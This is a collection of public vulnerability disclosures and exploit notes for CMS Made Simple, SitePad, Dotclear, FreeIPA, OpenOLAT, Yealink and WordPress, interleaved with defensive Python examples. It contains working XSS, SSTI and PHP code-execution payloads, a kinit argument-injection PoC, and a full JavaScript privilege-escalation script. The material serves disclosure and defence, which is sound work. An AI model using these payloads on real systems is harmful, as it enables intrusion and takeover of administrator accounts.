<pre><code># Exploit Title: CMS Made Simple Version: 2.2.19 - SSTI<br /># Date: 2024-21-02<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://www.cmsmadesimple.org/<br /># Version: 2.2.19<br /># Tested on: https://www.softaculous.com/demos/CMS_Made_Simple<br /><br /><br />1 ) Log in as admin and go to Layout > Design Manager > Breadcrumbs<br />2 ) Click Edit and enter the SSTI payload: {7*7} , {$smarty.version}, {{7*7}}<br />3 ) Click Apply > Submit<br />4 ) Go to the home page > https://127.0.0.1/CMS_Made_Simple/index.php?page=templates-and-stylesheets<br />You will see: 49 class="breadcrumbs"<br /><br /></code></pre>
<pre><code># Exploit Title: CMS Made Simple Version: 2.2.19 - Stored XSS<br /># Date: 2024-21-02<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://www.cmsmadesimple.org/<br /># Version: 2.2.19<br /># Tested on: https://www.softaculous.com/demos/CMS_Made_Simple<br /><br /><br />1 ) Log in as admin and go to Content > File Manager<br />2 ) In the New directory field, enter the payload "><img src=x onerrora=confirm() onerror=confirm(1)><br />3 ) After clicking Run you will see an alert box<br /><br /></code></pre>
<pre><code># Exploit Title: CMS Made Simple Version: 2.2.19 - Remote Code Execution<br /># Date: 2024-21-02<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://www.cmsmadesimple.org/<br /># Version: 2.2.19<br /># Tested on: https://www.softaculous.com/demos/CMS_Made_Simple<br /><br /><br />1 ) Log in as admin and go to Extensions > User Defined Tags<br />2 ) In the Code field, enter the payload <?php echo system('id'); ?><br />3 ) After clicking Run you will see the result:<br />uid=1000(admin) gid=1000(admin) groups=1000(admin) uid=1000(admin) gid=1000(admin) groups=1000(admin)<br /></code></pre>
<pre><code># Exploit Title: SitePad Version : 1.8.2 - Stored XSS<br /># Date: 2024-21-02<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://sitepad.com/<br /># Version : 1.8.2<br /># Tested on: https://www.softaculous.com/apps/blogs/SitePad<br /><br /><br />1 ) Go to Templates > Header > Edit Pagelayer Template<br />2 ) In the Name field, enter: "><img src=x onerrora=confirm() onerror=confirm(1)><br />3 ) After saving and refreshing the page you will see the alert box at https://127.0.0.1/SitePad/site-admin/admin.php?page=pagelayer_template_wizard&post=9<br /></code></pre>
<pre><code># Exploit Title: Dotclear Version : 2.29 - Reflected XSS<br /># Date: 2024-21-02<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://dotclear.org/<br /># Version : 2.29<br /># Tested on: https://softaculous.com/demos/dotclear<br /><br />1 ) Enter the admin panel and type this payload into the search box: "><img src=x onerrora=confirm() onerror=confirm(1)><br />2 ) https://127.0.0.1/Dotclear/admin/index.php?qx="><img src=x onerrora=confirm() onerror=confirm(1)>&process=Search<br />3 ) You will see an alert box<br /></code></pre>
<pre><code>Summary:<br />Specially crafted HTTP requests can read files on the DC server and use keytab files to authenticate as different Kerberos principals.<br /><br />Tested FreeIPA version:<br />ipa-server-4.10.1<br /><br />Details<br />The "user" parameter of the HTTP URI "/sip/session/login_password" is passed into the "run" function in the file "ipautil.py", which in turn passes it as an argument to "subprocess.Popen". As a result, the following list is passed: "args=['/usr/bin/kinit', '{user params}', '-c', '/run/ipa/ccaches/kinit_13704', '-T', '/run/ipa/ccaches/armor_13704', '-C', '-E']". If "{user params}" is a string such as "-V", it is interpreted as an option for "kinit". As a result, remote attackers can use options such as "-t", "-X", "-S" or "-I" for DoS, or use a keytab file from the system to log in as principals without a password.<br /><br />PoC (attached screenshots):<br />Simple request with "user=-H&password=0000000"<br />With multiple parameters "user=-Vkt&password=0000000"<br /><br />Impact<br />Possible DoS, use of keytabs from the system and reading files on the DC.<br /><br /></code></pre>
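The root cause described above is a request parameter becoming argv[1] of kinit, where a leading "-" turns it into an option. The following is an added example, not FreeIPA's code and not the upstream fix: it rebuilds the argv list the advisory quotes, once in the unsafe form and once behind a principal-name check. The check itself (reject empty names, names starting with "-", whitespace or control characters, and anything outside a conservative principal character set) is an assumption about what such a fix should enforce; the ccache paths used in the helpers are placeholders.

```python
import re

# Added, illustrative example: not FreeIPA's code. The argv layout mirrors the list
# quoted in the advisory; the validation rule is an assumption about what a fix
# should enforce, not a description of the upstream patch.
KINIT = "/usr/bin/kinit"

# Assumed principal syntax: local part, optional /instance, optional @REALM parts
# (several, since kinit -E treats the name as an enterprise principal).
# A hyphen is allowed inside the name but never as the first character.
_PRINCIPAL_RE = re.compile(
    r"^[A-Za-z0-9_.][A-Za-z0-9_.\-]*(?:/[A-Za-z0-9_.\-]+)?(?:@[A-Za-z0-9_.\-]+)*$"
)


class InvalidPrincipal(ValueError):
    """Raised when a login name could be read by kinit as something other than a principal."""


def validate_principal(user):
    if not user or user.startswith("-"):
        # "-H", "-V", "-Vkt": kinit would parse these as options, not as a principal
        raise InvalidPrincipal("principal must not be empty or start with '-'")
    if any(ch.isspace() or ord(ch) < 0x20 for ch in user):
        raise InvalidPrincipal("principal contains whitespace or control characters")
    if not _PRINCIPAL_RE.match(user):
        raise InvalidPrincipal("principal contains characters outside the allowed set")
    return user


def unsafe_kinit_args(user, ccache, armor_ccache):
    """The pattern the advisory describes: the request parameter lands in argv unchanged."""
    return [KINIT, user, "-c", ccache, "-T", armor_ccache, "-C", "-E"]


def safe_kinit_args(user, ccache, armor_ccache):
    """Same argv, but the principal is validated before it becomes an argument."""
    return [KINIT, validate_principal(user), "-c", ccache, "-T", armor_ccache, "-C", "-E"]


# Placeholder ccache paths for the two helpers below (the real ones carry a PID suffix).
_CCACHE = "/run/ipa/ccaches/kinit_PLACEHOLDER"
_ARMOR = "/run/ipa/ccaches/armor_PLACEHOLDER"


def is_option_like(user):
    """True when the unsafe argv would hand kinit an extra option instead of a principal."""
    return unsafe_kinit_args(user, _CCACHE, _ARMOR)[1].startswith("-")


def rejected(user):
    """Does the hardened builder refuse this login name?"""
    try:
        safe_kinit_args(user, _CCACHE, _ARMOR)
    except InvalidPrincipal:
        return True
    return False


if __name__ == "__main__":
    for candidate in ("alice", "alice@EXAMPLE.TEST", "-H", "-Vkt"):
        print(f"{candidate!r}: option-like={is_option_like(candidate)} rejected={rejected(candidate)}")
```

The leading-dash check alone closes the reported hole; the character whitelist is defence in depth so that a future change to the command line cannot reopen it through some other kinit syntax.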
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20240220-0 ><br />=======================================================================<br /> title: Multiple Stored Cross-Site Scripting Vulnerabilities<br /> product: OpenOLAT (Frentix GmbH)<br /> vulnerable version: <= 18.1.4 and <= 18.1.5<br /> fixed version: 18.1.6 / 18.2<br /> CVE number: CVE-2024-25973, CVE-2024-25974<br /> impact: High<br /> homepage: https://www.openolat.com/<br /> found: 2023-12-20 and 2024-01-20<br /> by: Mike Klostermaier (Office Berlin)<br /> Johannes Völpel (Office Berlin)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"frentix operates in the areas of e-learning, software development, multimedia<br />and media production. Providing information and lasting impressions – we<br />try to reconcile this goal in the area of tension between technology, usability<br />and design."<br /><br />"The LMS OpenOlat is an internet-based learning platform for teaching, learning,<br />assessment and communication, an LMS, a learning management system."<br /><br />Source: https://www.openolat.com/unternehmen/<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patch which should be installed immediately.<br /><br />SEC Consult highly recommends performing a thorough security review of the product<br />conducted by security professionals to identify and resolve potential further<br />security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Multiple Stored Cross-Site-Scripting Vulnerabilities (CVE-2024-25973)<br />Insufficient filtering and sanitization of user input leads to the creation<br />of groups, courses and other 
resources that contain XSS payloads.<br />This allows an attacker to execute JavaScript code with the permissions of the<br />victim in the context of the user's browser.<br /><br />2) Privilege escalation via XSS due to insecure CSP<br />If the content security policy is not set securely and there is content on<br />the same page that can be manipulated by the attacker, a privilege<br />escalation can take place.<br /><br />3) Stored Cross-Site-Scripting within the Media Center (CVE-2024-25974)<br />Insufficient filtering and sanitization of malicious files uploaded by a user<br />leads to stored resources within the Media Center that could contain XSS payloads.<br />This allows an attacker to execute JavaScript code with the permissions of the<br />victim in the context of the user's browser.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Multiple Stored Cross-Site-Scripting Vulnerabilities (CVE-2024-25973)<br />Various XSS issues have been found in different functions of OpenOLAT.<br />The following examples show different attack scenarios.<br /><br />Example 1 - Stored Cross-Site-Scripting within Coursenames<br />Due to insufficient filtering and sanitization of user input, an attacker<br />with rights to create or edit groups can create a course with a name that<br />contains an XSS payload. When a user edits this course the name including<br />the payload is displayed and executed. Furthermore, the XSS payload is<br />executed when editing the course via the course-editor, within the course-editor's<br />"layout" tab inside the preview. 
This also happens multiple times at multiple<br />locations during the publishing workflow.<br /><br />The following payload was used as the course name:<br />```<br /><img src=x onerror=alert('from\u0020subcat\u0020title')><br />```<br /><br />Example 2 - Stored Cross-Site-Scripting within Catalogname<br />An attacker, who is authenticated with rights that allow creating or renaming<br />catalogs, is able to create a catalog (also called sub-category) with a name that<br />contains an XSS payload due to insufficient filtering and sanitization of user<br />input.<br />When a user publishes a course, the name of the catalog including the<br />payload is displayed and executed within the "Create catalog entry" tab<br />when selecting "Add to catalog".<br /><br />The following payload was used as the catalog name:<br />```<br /><img src=x onerror=alert('from\u0020subcat\u0020title')><br />```<br /><br />Example 3 - Stored Cross-Site-Scripting within Curriculum Management<br />An authenticated user whose role is authorized to create curriculums is<br />able to create curriculums whose name contains a JavaScript<br />payload. These are shown to the members in some views where the JavaScript<br />payload is executed. To do this, navigate to the overview of the curriculums<br />via "Curriculum management".<br />A curriculum can be created via the "Create new curriculum" button in the<br />window that appears. 
To recreate the vulnerability, it is sufficient to<br />enter a JavaScript payload as the identifier.<br /><br />The following payload was used as curriculum name:<br />```<br /><img src=x onerror=alert('from\u0020subcat\u0020title')><br />```<br />When a user with sufficient rights opens the manipulated curriculum via the<br />"curriculum browser" within the "Curriculum management" the payload within<br />the curriculum name gets executed within the context of the user's browser.<br /><br /><br />Example 4 - Stored Cross-Site-Scripting within Alt-Text of Media-Files<br />An attacker, who is authenticated with rights that allow uploading files,<br />can upload media files via the "Media Centre" and enter metadata for these<br />files. One of the fields used for image metadata is the so-called alt-text<br />field, which is used to enter an alternative display text for image files.<br />This alternative text is not sanitized properly when entered during the upload<br />of files.<br /><br />The following payload was assigned to an image file as alt-text:<br />```<br />"><img src=a onerror=alert(document.location)><br />```<br /><br />The upload of the image file works without further problems and is confirmed.<br />After successfully uploading the image with a manipulated alt-text, the<br />transmitted payload is executed directly. Using the function to share content<br />with other users, this manipulated image can be shared to potential victims<br />(e.g. a system administrator). The user with whom the image has been shared<br />can preview it in their media center. As soon as the user views the image details,<br />the JavaScript payload stored within the alt-text is executed in the context<br />of the victim's browser.<br /><br /><br />2) Privilege escalation due to unsafe-eval<br />If the content security policy is not set securely and there is content on the<br />same page that can be manipulated by the attacker, a privilege escalation<br />can take place. 
As the content security policy is set to "Report-Only" and<br />"unsafe-eval" is set by default in OpenOLAT, the following attack is<br />possible in at least most of the stored XSS cases shown here.<br /><br />An example that loads a script from an external source was not used here,<br />as this would not have been possible with an activated CSP, whereas this<br />vulnerability can also be exploited with an activated standard CSP from<br />OpenOLAT.<br />The following example can be used at any given point where an XSS is possible<br />and another string can be manipulated within a readable context:<br />```<br />"><img src=x onerror='var ps = document.querySelectorAll(`p`); for (var i = 0;<br />i < ps.length; i++) { var c = ps[i].textContent; if (c.startsWith(`YXN`))<br />{ eval(atob(c)); } }'<br />```<br /><br />This JavaScript code searches the website for elements that begin<br />with a certain string (in our example "YXN"), decodes them from base64 and<br />executes them (due to the unsafe-eval policy) as JavaScript code.<br />This has been tested to be working with example 4 with the above payload<br />as the alt-text and the payload mentioned below as the description of the<br />media file.<br />The string "YXN" is the start of the base64 encoding of the following payload:<br />```<br />async function main() {<br /> function sleep(ms) {<br /> return new Promise(resolve => setTimeout(resolve, ms));<br /> }<br /> var n = 2000;<br /> var anchorElement = document.querySelector('a[title="Manage users and system groups"]');<br /> anchorElement.click();<br /> await sleep(n);<br /> var buttons = document.querySelectorAll('a[title="Organisations"]');<br /> buttons[0].click();<br /> await sleep(n);<br /> var links = document.querySelectorAll('a');<br /> var organisationLink = Array.from(links).find(function (link) {<br /> return link.textContent === 'OpenOLAT';<br /> });<br /> organisationLink.click();<br /> await sleep(n);<br /> var links = 
document.querySelectorAll('a');<br /> var chadLink = Array.from(links).find(function (link) {<br /> return link.textContent === 'Chad';<br /> });<br /> await sleep(n);<br /> chadLink.click();<br /> await sleep(n);<br /> var roleTabLinks = document.querySelectorAll('a[role="tab"]');<br /> var rolesLink = Array.from(roleTabLinks).find(function (link) {<br /> return link.textContent === 'Roles';<br /> });<br /> await sleep(n);<br /> rolesLink.click();<br /> await sleep(n);<br /> var inputElement = document.querySelector('input[value="administrator"]');<br /> inputElement.click();<br /> await sleep(n);<br /> var inputElement = document.querySelector('input[value="sysadmin"]');<br /> inputElement.click();<br /> await sleep(n);<br /> var saveButton = document.querySelector('button[value="Save"]');<br /> saveButton.click();<br />}<br />main();<br />```<br /><br />The code shown here utilizes the static structure of OpenOLAT. The use of<br />control elements is predictable, as long as the name of the organization used<br />within the OpenOLAT instance is known. This information is freely accessible to<br />every logged-in user. Lines 14 and 20 contain variables which must be adapted<br />to the corresponding OpenOLAT instance and attacker username. The executed<br />script searches for HTML elements with predictable names in order to navigate<br />to an administrative interface within the application and elevate the<br />attacker's rights to administrative level.<br /><br />The script works with two-second pauses between the individual actions<br />to ensure that all actions are only executed after the page has loaded. Even<br />if this is visible to the victim, the waiting times between the actions can be<br />optimized in a real attack and can also be used with the help of obfuscation<br />measures (e.g. 
additional windows that open and hide the actions).<br /><br /><br />3) Stored Cross-Site-Scripting (XSS) within the Media-Center (CVE-2024-25974)<br />It is possible to upload files within the Media Center of OpenOLAT version 18.1.5<br />as an authenticated user without any other rights.<br />While the filetypes are limited, an SVG containing an XSS payload can be<br />uploaded. The following content has been uploaded within a file<br />named 'xss.svg':<br />```<br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /><script type="text/javascript"><br /> alert(document.location);<br /></script><br /></svg><br />```<br /><br />After a successful upload the file can be shared with groups of users.<br />By sharing the file with a group that an administrator is a member of, the<br />administrator can access the file and open it, which will open the file in a<br />new tab within the browser. 
This leads to the execution of the shown script and<br />will display a message window stating the current domain and path.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following versions have been tested, each being the latest version available<br />at the time of the test:<br />* OpenOLAT 18.1.4 Vulnerabilities 1 and 2<br />* OpenOLAT 18.1.5 Vulnerability 3<br /><br />OpenOLAT version 18.2 was checked to verify whether the identified issues were properly<br />fixed.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2024-01-10: Contacting vendor through contact@frentix.com<br />2024-01-10: Very quick vendor response within an hour, sending security<br /> advisory to provided contact.<br />2024-01-10: Feedback from vendor that we submitted known/already fixed issues<br /> for version 18.1.<br /> Retesting latest version 18.1.4, but only three of our submitted<br /> issues had been fixed before (removed from advisory), found<br /> additional, new XSS issues again in latest version.<br />2024-01-11: Sending updated security advisory to the vendor.<br />2024-01-11: Quick feedback from vendor declaring example 1 to 3 as accepted<br /> risk, as authors have a trusted position and XSS is only seen as<br /> a risk if the attacker is unauthenticated or has low privileges.<br /> Example 4 will be patched with the upcoming release. No comment<br /> from the vendor on vulnerability 2 regarding the unsafe default<br /> configuration.<br />2024-01-11: Sending examples 1 to 3 and explaining the risk potential from an<br /> attacker's perspective to the vendor. Co-ordination with the vendor<br /> regarding the release date of the new version, which includes a fix<br /> for example 4. 
Asking again about the standard configuration<br /> mentioned in vulnerability 2 and the vendor's position or judgement<br /> on this.<br />2024-01-11: Quick reply from the vendor confirming the release date of the new<br /> version on 2024-01-17. With regard to examples 1 to 3, the vendor<br /> confirmed that no fix is planned. Reference is made to modules in<br /> development which will replace the modules containing<br /> vulnerabilities in the course of upcoming releases. With regard<br /> to privilege escalation, which is enabled by the CSP in chapter 2,<br /> the vendor points out that the "unsafe-eval" or "unsafe-inline"<br /> option cannot simply be deactivated in the architecture currently<br /> in use. With regard to the "report-only" setting of the CSP, the<br /> vendor refers to the lack of possibilities to enforce this on<br /> the part of the vendor. However, the vendor advises customers to<br /> activate it.<br />2024-01-17: Release of version 18.1.5 by the vendor. A fix of example 1, 2 and 4<br /> was verified by the researchers within this version. Example 3 as<br /> well as the CSP from chapter 2 are still exploitable. The PoC code<br /> snippet has been redacted in example 3.<br />2024-01-18: Mail from vendor, informing us about the release of the patched<br /> version. Vendor states that the development of OpenOLAT will use<br /> all points from this advisory as guidance for further improvements.<br />2024-01-19: Sending mail to vendor confirming that the examples 1, 2 and 4<br /> are fixed. 
Submitted updated draft of this advisory.<br />2024-01-21: Informing vendor about newly found XSS within the Media Center, which<br /> has been added to this advisory as vulnerability 3 (SVG).<br />2024-01-21: Fast response from vendor informing us that the found XSS will be<br /> fixed with an update at the end of January.<br />2024-01-23: Sending mail to the vendor thanking them for the quick reply.<br />2024-01-31: Release of version 18.1.6 by the vendor.<br />2024-02-09: The researchers can confirm that all vulnerabilities mentioned<br /> within chapters 1 and 3 are fixed and can no longer be exploited.<br /> Vulnerability 2 still works as documented. Informing the vendor<br /> that we can confirm the fix and thanking again for the quick and<br /> solution-oriented communication.<br />2024-02-09: Vendor: Systematic search for further XSS issues, version 18.2.1<br /> contains even more fixes. Version 19 will have CSP enabled by<br /> default.<br />2024-02-13: Assigning CVE numbers.<br />2024-02-20: Coordinated release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provided a patched version 18.1.6 / 18.2 or higher which can be downloaded<br />from:<br />https://www.openolat.com/releases/<br /><br />Additionally, it is advised to enforce the Content-Security-Policy instead of<br />running it in "Report-Only" mode, and to configure it as strictly as possible. The upcoming<br />version 19 will enable CSP by default.<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. 
It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Johannes Völpel & Mike Klostermaier / @2024<br /><br /></code></pre>
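Vulnerability 2 above depends on two header-level weaknesses rather than on any one XSS: the policy is only sent as Content-Security-Policy-Report-Only, and the effective script policy permits 'unsafe-eval'. The following is an added example, not code from the advisory or from OpenOLAT: a small audit that takes a response header set and reports those conditions, which is the check an operator would run after applying the Solution section. The header sets at the bottom are constructed; the first mirrors the default the advisory describes, the second an enforced policy with a nonce.

```python
# Added example, not code from the advisory or from OpenOLAT: audit the
# Content-Security-Policy response headers for the weaknesses vulnerability 2
# relies on. The header sets at the bottom are constructed samples.

BROAD_SOURCES = {"*", "http:", "https:", "data:"}


def parse_csp(value):
    """Split a CSP header value into {directive: [source expressions]}."""
    policy = {}
    for directive in value.split(";"):
        tokens = directive.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def script_sources(policy):
    """script-src falls back to default-src when absent; None means scripts are unrestricted."""
    if "script-src" in policy:
        return policy["script-src"]
    return policy.get("default-src")


def audit_policy(header_name, value):
    """Findings for one policy string, regardless of whether it is enforced."""
    sources = script_sources(parse_csp(value))
    if sources is None:
        return [f"{header_name}: neither script-src nor default-src, scripts are unrestricted"]
    lowered = {s.lower() for s in sources}
    findings = []
    if "'unsafe-eval'" in lowered:
        findings.append(f"{header_name}: script-src allows 'unsafe-eval', so eval(atob(...)) payloads run")
    # CSP3 browsers ignore 'unsafe-inline' once a nonce or hash source is present
    keyed = any(s.startswith("'nonce-") or s.startswith("'sha") for s in lowered)
    if "'unsafe-inline'" in lowered and not keyed:
        findings.append(f"{header_name}: script-src allows 'unsafe-inline' without a nonce or hash")
    broad = sorted(BROAD_SOURCES & lowered)
    if broad:
        findings.append(f"{header_name}: script-src includes overly broad source(s) {broad}")
    return findings


def audit_csp_headers(headers):
    """Findings for a dict of response headers; header names are matched case-insensitively."""
    lowered = {name.lower(): value for name, value in headers.items()}
    enforced = lowered.get("content-security-policy")
    report_only = lowered.get("content-security-policy-report-only")
    if enforced is None and report_only is None:
        return ["no Content-Security-Policy header at all"]
    findings = []
    if enforced is None:
        findings.append("CSP is delivered only as Content-Security-Policy-Report-Only: "
                        "violations are reported, nothing is blocked")
    if enforced is not None:
        findings += audit_policy("Content-Security-Policy", enforced)
    if report_only is not None:
        findings += audit_policy("Content-Security-Policy-Report-Only", report_only)
    return findings


# Constructed header sets: the first mirrors the default the advisory describes
# (Report-Only plus 'unsafe-eval'), the second is what the Solution section asks for.
WEAK_DEFAULT = {
    "Content-Security-Policy-Report-Only":
        "default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src 'self' data:",
}
ENFORCED_STRICT = {
    "Content-Security-Policy":
        "default-src 'self'; script-src 'self' 'nonce-r4nd0m'; object-src 'none'; base-uri 'self'",
}

if __name__ == "__main__":
    for label, hdrs in (("weak default", WEAK_DEFAULT), ("enforced strict", ENFORCED_STRICT)):
        print(label, "->", audit_csp_headers(hdrs) or ["no findings"])
```

Note that a Report-Only header is still worth auditing: once an operator flips it to enforcing, any 'unsafe-eval' it carries becomes the enforced policy, so both headers are run through the same checks.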
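For vulnerability 3 the fix has two halves: refuse SVG uploads that carry active content, and serve whatever is stored so that the browser never renders it as a document in the application's origin. The following is an added example, not code from the advisory or from OpenOLAT; the scan uses the standard-library XML parser (in production, defusedxml is the safer choice for untrusted input), and the samples are constructed, the first of them reproducing the xss.svg body shown above.

```python
import xml.etree.ElementTree as ET

# Added example, not code from the advisory or from OpenOLAT. An upload-time scan
# that refuses SVGs carrying active content, plus the response headers that keep a
# stored SVG from being rendered inline should the scan ever be bypassed.
# For production use, parse untrusted XML with defusedxml instead of the stdlib parser.

ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}
ACTIVE_SCHEMES = {"javascript", "vbscript", "data"}


def _local(name):
    """Strip the namespace from names like '{http://www.w3.org/2000/svg}script'."""
    return name.rsplit("}", 1)[-1].lower()


def find_active_content(svg_bytes):
    """Return the reasons an SVG must be refused; an empty list means none were found."""
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    if _local(root.tag) != "svg":
        return [f"root element is <{_local(root.tag)}>, not <svg>"]
    reasons = []
    for elem in root.iter():
        tag = _local(elem.tag)
        if tag in ACTIVE_ELEMENTS:
            reasons.append(f"<{tag}> element")
        for attr, value in elem.attrib.items():
            name = _local(attr)
            if name.startswith("on"):
                reasons.append(f"event handler attribute {name} on <{tag}>")
            scheme = value.strip().lower().split(":", 1)[0]
            if ":" in value and scheme in ACTIVE_SCHEMES:
                reasons.append(f"{scheme}: URL in {name} on <{tag}>")
    return reasons


def safe_download_headers(filename):
    """Serve a stored SVG as a download, with MIME sniffing and scripting switched off."""
    safe_name = filename.replace('"', "").replace("\\", "")
    return {
        "Content-Type": "image/svg+xml",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; script-src 'none'; sandbox",
    }


# Constructed samples: the first reproduces the xss.svg body from the advisory,
# the second is a harmless icon, the third carries an inline event handler.
XSS_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">
 alert(document.location);
</script>
</svg>"""

BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
<circle cx="5" cy="5" r="4" style="fill:#3366cc"/>
</svg>"""

HANDLER_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">
<rect width="10" height="10"/>
</svg>"""

if __name__ == "__main__":
    for label, body in (("xss.svg", XSS_SVG), ("icon.svg", BENIGN_SVG), ("handler.svg", HANDLER_SVG)):
        print(label, "->", find_active_content(body) or "clean")
```

The header set matters even for files the scan accepts: Content-Disposition: attachment stops the "opens in a new tab" behaviour the advisory relies on, nosniff stops a browser from reinterpreting the bytes, and the CSP sandbox keeps any script that does slip through out of the application's origin.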
<pre><code>CloudAware Security Advisory<br /><br />CVE-2024-24681: Insecure AES key in Yealink Configuration Encrypt Tool<br /><br /><br />========================================================================<br />Summary<br />========================================================================<br />A single, vendor-wide, hardcoded AES key in the configuration tool used to<br />encrypt provisioning documents was leaked, leading to a compromise of the<br />confidentiality of provisioning documents.<br /><br />========================================================================<br />Product<br />========================================================================<br />* Yealink Configuration Encrypt Tool (AES version)<br />* Yealink Configuration Encrypt Tool (RSA version <v1.2)<br /><br />========================================================================<br />Detailed description<br />========================================================================<br />The Yealink Configuration Encrypt Tool facilitates provisioning and<br />configuration management of Yealink products, such as VoIP phones. The tool<br />creates AES-encrypted provisioning documents containing configuration<br />directives such as<br />username=user1<br />passwword=passw0rd!<br />serverhost=sip.host.com<br />callerid=+19051231212<br />The files created by this tool are then transferred to the Yealink<br />equipment. The equipment decrypts the files and uses them to configure<br />itself. This process needs to be secure, so these files are encrypted.<br />The decryption is done with a static, hardcoded key that is identical<br />across all installs and customers. After decryption of such a file with the<br />hardcoded AES key, confidential information such as user passwords is<br />visible in plain text.<br />This implies that knowledge of this hardcoded key allows for the disclosure<br />of sensitive information from the configuration files, or that files with<br />different information can be introduced and are axiomatically trusted by<br />the phone.<br />As this key is static, this includes historic files from any customer that<br />used this tool.<br />The vendor has fixed this in version 1.2 of the Configuration Encrypt Tool.<br /><br />========================================================================<br />Solution<br />========================================================================<br />1) Upgrade Yealink Configuration Encrypt Tool to version 1.2<br />2) Evaluate the impact of the disclosure of any configurations rolled out<br />with prior versions of this tool (including, specifically, the leaking of<br />passwords)<br /><br />========================================================================<br />Mitigation<br />========================================================================<br />1) If an upgrade is not an option, as `anyone' can create valid configuration<br />files, ensure that affected equipment is unable to reach provisioning<br />servers.<br />2) Evaluate the impact of the disclosure of any configurations rolled out<br />prior to these mitigation steps<br /><br />========================================================================<br />Weblinks<br />========================================================================<br />https://github.com/gitaware/CVE/tree/main/CVE-2024-24681<br /><br />========================================================================<br />History<br />========================================================================<br />Early 2020: release of Configuration Encrypt Tool v1 containing RSA<br />encryption method<br />July 2022: Yealink informed that the “old” AES key is still present and working in the tool<br />2023: new version of Configuration Encrypt Tool v1.2 without a hardcoded AES<br />encryption key<br /></code></pre>
<pre><code># Title: WordPress 6.4.3 - Username Disclosure<br /># Author: h4shur<br /># Date: 2024-02-21<br /># Vendor Homepage: https://www.wordpress.org<br /># Software Link: https://www.wordpress.org/download<br /># Version: 6.4.3 and earlier<br /># Tested on: Windows 10 & Google Chrome<br /># Category : Web Application Bugs<br /><br />### Description :<br />The REST API allows simulating different request types. As such, we can<br />perform a POST request with the “users” string in the body of the request<br />and tell the REST API to act as if it had received a GET request.<br />The administrator's username can be seen in the "slug" field, and even<br />security plugins like "iThemes Security" do not block this path.<br /><br /><br />### POC :<br />https://target.com/wp-json/?rest_route=/wp/v2/users/<br /><br /># output :<br />[{"id":1,"name":"admin","url":"https:\/\/target.com<br />","description":"","link":"https:\/\/target.com<br />\/?author=1","slug":"admin_1l","avatar_urls":{"24":"https:\/\/<br />secure.gravatar.com<br />\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=24&d=mm&r=g","48":"https:\/\/<br />secure.gravatar.com<br />\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=48&d=mm&r=g","96":"https:\/\/<br />secure.gravatar.com<br />\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=96&d=mm&r=g"},"meta":[],"_links":{"self":[{"href":"https:\/\/<br />target.com<br />\/index.php?rest_route=\/wp\/v2\/users\/1"}],"collection":[{"href":"https:\/\/<br />target.com\/index.php?rest_route=\/wp\/v2\/users"}]}}]<br /><br /><br />### Admin Panel :<br />https://target.com/wp-admin<br />https://target.com/login.php<br /><br /><br />### contact :<br />h4shursec@gmail.com<br />twitter.com/h4shur<br />instagram.com/h4shur<br />t.me/h4shur<br /></code></pre>
